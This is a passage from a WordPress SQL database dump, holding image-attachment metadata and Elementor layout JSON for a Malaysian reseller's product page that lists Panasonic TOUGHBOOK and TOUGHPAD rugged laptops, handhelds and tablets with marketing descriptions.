hment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:389;s:4:\"file\";s:33:\"2018/12/tb_fz_a2_hero_front-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"tb_fz_a2_hero_front-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"tb_fz_a2_hero_front-1-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"tb_fz_a2_hero_front-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"tb_fz_a2_hero_front-1-418x300.png\";s:5:\"width\";i:418;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"tb_fz_a2_hero_front-1-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3381,2613,'_wp_attached_file','2018/12/prod-jtb2-hero.png'),(3382,2613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:334;s:4:\"file\";s:26:\"2018/12/prod-jtb2-hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"prod-jtb2-hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"prod-jtb2-hero-300x251.png\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"prod-jtb2-hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"prod-jtb2-hero-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"prod-jtb2-hero-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3384,2614,'_elementor_edit_mode','builder'),(3385,2614,'_elementor_template_type','post'),(3386,2614,'_wp_page_template','template-fullwidth.php'),(3388,2614,'_elementor_version','0.4'),(3391,2615,'_elementor_edit_mode','builder'),(3392,2615,'_elementor_template_type','post'),(3393,2615,'_wp_page_template','template-fullwidth.php');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (3394,2615,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><\\/div><p>\\u00a0<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><\\/div><p>\\u00a0<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><\\/div><p>\\u00a0<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\"